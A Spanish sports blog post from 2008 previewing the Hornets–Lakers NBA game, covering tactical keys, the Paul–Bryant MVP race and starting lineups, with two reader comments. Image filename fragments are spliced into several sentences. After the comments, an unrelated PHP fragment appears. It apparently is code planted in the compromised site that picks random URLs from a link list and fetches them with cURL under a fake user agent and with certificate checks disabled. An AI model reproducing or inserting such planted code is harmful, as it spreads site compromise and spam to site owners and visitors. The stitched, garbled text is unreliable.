La batalla por el Oeste: Hornets @ Lakers

11 de April de 2008 por MagicJohnson32

Hace unos días os ofrecíamos una previsión de los mejores y más decisivos partidos de lo que resta de regular season, y entre todos los encuentros mencionados destacábamos uno por todo lo que estará en juego. Ese momento, ese partido, ha llegado. Esta noche, a las 4:30 horas y televisado en directo por Cuatro, los Lakers tratarán de apurar sus opciones de ser primeros del Salvaje Oeste más salvaje que se recuerda. Para ello necesitarán superar a los Hornets, que aventajan a los californianos en 1.5 partidos y que incluso pueden permitirse una derrota.

La presión, por tanto, recaerá en los Lakers, que necesitan vencer no ya para aspirar a liderar la conferencia sino para asegurarse el primer puesto de su división. Una derrota ante los Hornets, combinada con victoria de los Suns en Houston (también esta cp3kb24noche, a las 2:30 horas) les dejaría en una situación muy comprometida: pasarían de la segunda a la quinta posición y con un partido contra los Spurs el domingo (a las 21:30, hora española).

Y, pese a la enorme transcendencia que el partido tendrá en la configuración de las eliminatorias de Playoffs, muchos ojos estarán más pendientes de un duelo individual que puede decidir el MVP 2007-2008. Chris Paul y Kobe Bryant parecen encabezar la carrera por el premio Maurice Podoloff por delante de LeBron James y Kevin Garnett, y esta noche tienen una ocasión inmejorable para ganar varios votos de los muchos indecisos que todavía han de decantarse.

Las claves

lodwestLos Lakers, quitando del entrenamiento con público de anoche ante los Clippers, han mostrado serios problemas defensivos tanto de perímetro como en la pintura. El reto que se les presenta esta noche es gigantesco: la amenaza ofensiva de los Hornets se concentra en todo lo que es capaz de generar Chris Paul en puntos y asistencias. Éstas se traducen por lo general en las suspensiones y juego al poste medio-bajo de David West, los triples abiertos de Stojakovic y los potentes pick & roll con Tyson Chandler, una jugada difícilmente defendible por equipos con la debilidad interior de los Lakers.

kobedunkhornetsY dado el escaso éxito que han cosechado los angelinos en la defensa sobre los bases rivales, sorprendería extraordinariamente un partido gris por parte de Chris Paul. Los Lakers han de tratar de reducir el impacto de West y Stojakovic (autor de 10 triples en la victoria de los Hornets en el Staples esta misma temporada), así como el de secundarios capaces de aportar, caso de Wells, Peterson, Pargo o Julian Wright.

Por parte local, y después del trámite ante los Clippers, habrá que comprobar cómo ha encajado el equipo las malas noticias sobre Bynum, que no ha recibido el permiso médico para entrenarse y del que aún se desconoce su fecha de regreso a las pistas. Existe además la eterna duda de si Lamar Odom jugará o se disfrazará de hombre invisible. Odom ha de ser fundamental en su trabajo defensivo sobre West pero también en ataque, aspecto en el que acostumbra a ausentarse. Gasol, aún renqueante, tendrá que tirar de recursos técnicos ante Chandler y mostrarse más activo en defensa, donde le espera una labor muy diferente a la de partidos anteriores.cp3laykers

La eficacia en los triples de Fisher, Radmanovic y los suplentes Farmar y Vujacic condicionará en gran medida el juego ofensivo de los Lakers y el planteamiento defensivo de Byron Scott. Un buen día desde la línea de tres frustraría la posible táctica de realizar 2 contra 1 sobre Kobe Bryant. Scott, buen amigo de Bryant desde sus tiempos como compañeros de equipo, asignará a priori la responsabilidad de la defensa sobre Kobe a Morris Peterson, ya que no se arriesgará a poner a Paul. Y ya que Mo-Pet no se caracteriza precisamente por su defensa, es de prever que veremos continuas ayudas por parte de los interiores, West y Chandler. Ahí es donde Odom y Gasol han de sacar provecho, como ya hicieron hace una semana ante los Mavs.

El partido: Hornets @ Lakers
Pista: Staples Center
Hora: 4:30 h.
Quintetos iniciales:
Paul-Peterson-Stojakovic-West-Chandler
Fisher-Bryant-Radmanovic-Odom-Gasol
TV: Cuatro (directo)

Comenta

2 comentarios a esta entrada

  1. Gallis dice:
    #1

    Nah, Paul se saldrá seguro…vamos, contra los Lakers se sale cualquier base, excepto Smush Parker…pero bueno, a ver si Odom y Pau les fuerzan un poco y Turiaf se dedica hoy a lo que se debe dedicar siempre y tanto West como Chandler tienen que sudar cada punto que consigan, además de trabajar en defensa.

    A mi el que me preocupa un poco es Pedja…y hombre, Pargo la puede liar, pero más en New Orleans que fuera…

    Otro duelo interesante será Vujacic (tiro exterior)- Bonzi (quien llevará al poste a su defensor una y otra vez)…

    En resumen…Vaaaaaaaaamooooooooosssssss!!!!!!!!!!!!!!!!!

      Citar

  2. Elio dice:
    #2

    De momento al descanso los Lakers ganan de paliza, 65-45. Han defendido mas de lo habitual, sobre todo en el primer cuarto donde han edificado la ventaja. Bryant y Gasol están espectaculares. Espero que acabe el partido tal como marcha ahora mismo!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>